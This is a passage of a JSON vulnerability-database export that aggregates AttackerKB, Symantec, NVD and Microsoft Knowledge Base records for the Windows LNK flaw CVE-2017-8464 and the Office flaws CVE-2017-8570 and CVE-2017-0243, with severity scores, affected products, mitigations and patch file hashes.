aka \u201cLNK Remote Code Execution Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:12am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-15T00:00:00", "type": "attackerkb", "title": "CVE-2017-8464", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2020-07-30T00:00:00", "id": "AKB:CC1AB90B-52E1-444F-A6F4-1F3F95B15460", "href": "https://attackerkb.com/topics/CESmJpn7xk/cve-2017-8464", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-19T08:14:06", "description": "Microsoft Office allows a remote code 
execution vulnerability due to the way that it handles objects in memory, aka \u201cMicrosoft Office Remote Code Execution Vulnerability\u201d. This CVE ID is unique from CVE-2017-0243.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-8570", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0243", "CVE-2017-8570"], "modified": "2021-07-27T00:00:00", "id": "AKB:01414FF4-26B2-4222-97E5-C5371A16E182", "href": "https://attackerkb.com/topics/XSQs25OqBH/cve-2017-8570", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-18T11:09:24", "description": "Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka \u201cMicrosoft Office Remote Code Execution Vulnerability\u201d. 
This CVE ID is unique from CVE-2017-8570.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-0243", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0243", "CVE-2017-8570"], "modified": "2020-07-23T00:00:00", "id": "AKB:2D05FC62-63F8-468A-A143-8C876A7F9789", "href": "https://attackerkb.com/topics/dk52zcC1qD/cve-2017-0243", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:05:27", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. 
Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "symantec", "title": "Microsoft Windows LNK CVE-2017-8464 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-06-13T00:00:00", "id": "SMNTC-98818", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98818", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:40", "description": "### Description\n\nMicrosoft Office is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 Service Pack 3 \n * Microsoft Office 2010 Service Pack 2 (32-bit editions) \n * Microsoft Office 2010 Service Pack 2 (64-bit editions) \n * Microsoft Office 2013 RT Service Pack 1 \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-07-11T00:00:00", "type": "symantec", "title": "Microsoft Office CVE-2017-8570 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2017-07-11T00:00:00", "id": "SMNTC-99445", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99445", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2023-02-08T16:15:44", "description": "Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. 
aka \"LNK Remote Code Execution Vulnerability.\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8464", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2017-8464", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8464", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-08T15:37:20", "description": "Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka \"Microsoft Office Remote Code Execution Vulnerability\". This CVE ID is unique from CVE-2017-8570.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "type": "cve", "title": "CVE-2017-0243", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0243", "CVE-2017-8570"], "modified": "2017-07-20T13:27:00", "cpe": ["cpe:/a:microsoft:office:2007", 
"cpe:/a:microsoft:web_applications:2010", "cpe:/a:microsoft:office:2010", "cpe:/a:microsoft:business_productivity_servers:2010"], "id": "CVE-2017-0243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0243", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:business_productivity_servers:2010:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:web_applications:2010:sp2:*:*:*:*:*:*"]}, {"lastseen": "2023-02-08T16:15:55", "description": "Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka \"Microsoft Office Remote Code Execution Vulnerability\". This CVE ID is unique from CVE-2017-0243.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "type": "cve", "title": "CVE-2017-8570", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0243", "CVE-2017-8570"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:microsoft:office:2016", 
"cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2010"], "id": "CVE-2017-8570", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8570", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:rt:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*"]}], "mskb": [{"lastseen": "2023-03-15T10:19:06", "description": "None\n## Summary\n\nA remote code execution exists in Microsoft Windows that could allow remote code execution if the icon of a specially crafted shortcut is displayed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \nTo learn more about the vulnerability, see[ CVE-2017-8464](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-8464>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4021903>) website. \n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: June 13, 2017](<http://support.microsoft.com/en-us/help/20170613>)\n\n## More Information\n\n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files. 
\n \n**Windows Server 2008 file information**\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## How to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update: FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\n## File Information\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4021903-x86.msu| E242C183D5161A316B402855F03C57150EF59CF4| 012F5FA414B1B6B36855DD20E476FEDD457402C16A4D54E67BC689248D68C8C2 \nWindows6.0-KB4021903-ia64.msu| DCA18000239FA5C77F2F72C5D7E4C4F9D3442152| 1892A9631E1D1CCA3676D875A5609A08B4A945C809B277FD2F3804F1B2A28BFA \nWindows6.0-KB4021903-x64.msu| D945E443391871F55A9D01D3FDD4C6C48370ECEC| 13F6CF468A08B8C36523B13D70ECB21D9B5B77CDD681208685F80C57AD348618 \n \n## For all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nShell32.dll| 6.0.6002.19785| 11,588,096| 11-May-2017| 15:55| x86 \nShell32.dll| 6.0.6002.24102| 11,591,168| 10-May-2017| 19:10| x86 \n \n## For all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nShell32.dll| 6.0.6002.19785| 19,090,432| 11-May-2017| 15:42| IA-64 \nShell32.dll| 6.0.6002.24102| 19,098,624| 10-May-2017| 15:17| IA-64 \nShell32.dll| 6.0.6002.19785| 11,588,096| 11-May-2017| 15:55| x86 \nShell32.dll| 6.0.6002.24102| 11,591,168| 10-May-2017| 19:10| x86 \n \n## For all supported 
x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nShell32.dll| 6.0.6002.19785| 12,901,888| 11-May-2017| 16:11| x64 \nShell32.dll| 6.0.6002.24102| 12,905,984| 10-May-2017| 18:03| x64 \nShell32.dll| 6.0.6002.19785| 11,588,096| 11-May-2017| 15:55| x86 \nShell32.dll| 6.0.6002.24102| 11,591,168| 10-May-2017| 19:10| x86\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mskb", "title": "LNK remote code execution vulnerability: June 13, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2017-06-13T07:00:00", "id": "KB4021903", "href": "https://support.microsoft.com/en-us/help/4021903", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:05:31", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. 
To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 2 for Office 2010](<http://support.microsoft.com/kb/2687455>) installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>). \n--- \n \n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB3213624>) website. \n--- \n \n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. 
Follow the installation instructions on the download page to install the update.\n\n * [Download the security update KB3213624 for the 32-bit version of Office 2010](<http://www.microsoft.com/download/details.aspx?familyid=9dcb6ee0-6209-4ce0-af94-a69e2e00d534>)\n * [Download the security update KB3213624 for the 64-bit version of Office 2010](<http://www.microsoft.com/download/details.aspx?familyid=ab38a40b-1872-4943-a35a-6e35df1e599c>) \n--- \n \n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: July 11, 2017](<https://support.microsoft.com/en-us/help/20170711>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [KB3203460](<http://support.microsoft.com/kb/3203460>).\n\n### File hash information\n\nPackage Name| Package Hash SHA 1| Package Hash SHA 2 \n---|---|--- \nmso2010-kb3213624-fullfile-x86-glb.exe| B7ACB07450F66F668F4619BF6272AA5D972EE515| 5E8C6CFB9751DEC962EC7B09560908EACFD10E7352057EBBF5CF4F6E1CA2DC71 \nmso2010-kb3213624-fullfile-x64-glb.exe| 64354AF9E4D30C22C916CCFBD6DBA9D2B1A19DFD| CF4A005CF5BFDFF5F7E4421BD29BA8E64A8750C69D7D8CF43CBED77955DFA031 \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. 
Additionally, the dates and the times may change when you perform certain operations on the files.For all supported x86-based versions of Office 2010| File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmso.dll.x86| mso.dll| 14.0.7184.5000| 18,642,688| 06-Jul-2017| 04:19 \nFor all supported x64-based versions of Office 2010File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmso.dll.x64| mso.dll| 14.0.7184.5000| 24,346,368| 05-Jul-2017| 02:33 \nmso.dll.x86| mso.dll| 14.0.7184.5000| 18,642,688| 06-Jul-2017| 04:19 \n \n## How to get help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<https://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<https://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)Propose a feature or provide feedback on Office Core: [Office User Voice portal](<https://office.uservoice.com/>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T07:00:00", "type": "mskb", "title": "Description of the security update for Office 2010: July 11, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2017-07-11T07:00:00", "id": "KB3213624", "href": "https://support.microsoft.com/en-us/help/3213624", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-12T11:13:17", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 1 for Microsoft Office 2013](<http://support.microsoft.com/kb/2817430>) installed on the computer.\n\n## Improvements and fixes\n\nThis security update contains improvements and fixes for the following nonsecurity issues:\n\n * This update includes the improved translations for the following applications:\n * The Danish version of Access, Excel, and Word.\n * The Finnish and Swedish versions of Excel.\n * The Serbian version of Outlook.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>). 
